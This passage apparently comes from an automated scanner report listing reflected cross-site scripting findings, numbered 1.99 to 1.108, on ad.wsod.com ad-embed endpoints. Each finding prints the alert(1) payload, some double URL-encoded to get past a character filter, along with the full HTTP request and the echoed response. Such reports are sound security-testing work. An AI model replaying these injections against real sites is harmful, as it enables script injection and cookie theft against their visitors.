<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
7251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=&59b8d"><script>alert(1)</script>94ff8a219f7=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.99. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5d53"-alert(1)-"6b4d3c78d35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=&f5d53"-alert(1)-"6b4d3c78d35=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2691

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
7251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=&f5d53"-alert(1)-"6b4d3c78d35=1">
...[SNIP]...

1.100. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6c61%2522%253balert%25281%2529%252f%252f94085d9ef0d was submitted in the REST URL parameter 2. This input was echoed as a6c61";alert(1)//94085d9ef0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357a6c61%2522%253balert%25281%2529%252f%252f94085d9ef0d/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2496

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357a6c61";alert(1)//94085d9ef0d/475.0.iframe.200x33/1300828294**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=130083
...[SNIP]...

1.101. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1b834ed8a3 was submitted in the REST URL parameter 2. This input was echoed as 98bf0"><script>alert(1)</script>c1b834ed8a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135798bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1b834ed8a3/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2541

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a63135798bf0"><script>alert(1)</script>c1b834ed8a3/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.102. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54d6e%2522%253balert%25281%2529%252f%252f327e1fc8239 was submitted in the REST URL parameter 3. This input was echoed as 54d6e";alert(1)//327e1fc8239 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3354d6e%2522%253balert%25281%2529%252f%252f327e1fc8239/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2496

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3354d6e";alert(1)//327e1fc8239/1300828295**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqh
...[SNIP]...

1.103. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43a10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e041566a1ce1 was submitted in the REST URL parameter 3. This input was echoed as 43a10"><script>alert(1)</script>041566a1ce1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3343a10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e041566a1ce1/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2541

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3343a10"><script>alert(1)</script>041566a1ce1/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.104. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35630"-alert(1)-"a23e707c4c2 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*35630"-alert(1)-"a23e707c4c2 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2468

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
ce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*35630"-alert(1)-"a23e707c4c2">
...[SNIP]...

1.105. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27167"><script>alert(1)</script>e45a8d5565a was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*27167"><script>alert(1)</script>e45a8d5565a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2498

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
ce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*27167"><script>alert(1)</script>e45a8d5565ahttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.106. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 460db"-alert(1)-"2523358bd68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*&460db"-alert(1)-"2523358bd68=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2474

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
e805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*&460db"-alert(1)-"2523358bd68=1">
...[SNIP]...

1.107. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d7a3"><script>alert(1)</script>904b1f0a7a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*&2d7a3"><script>alert(1)</script>904b1f0a7a4=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2504

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
e805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*&2d7a3"><script>alert(1)</script>904b1f0a7a4=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.108. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954** [10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954**

Issue detail

The value of the 10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6278d'-alert(1)-'7ee5cbd0701 was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*6278d'-alert(1)-'7ee5cbd0701 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:11:57 GMT; path=/
Set-Cookie: i_1=46:475:832:132:0:42331:1300828317:L|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2; expires=Thu, 21-Apr-2011 21:11:57 GMT; path=/
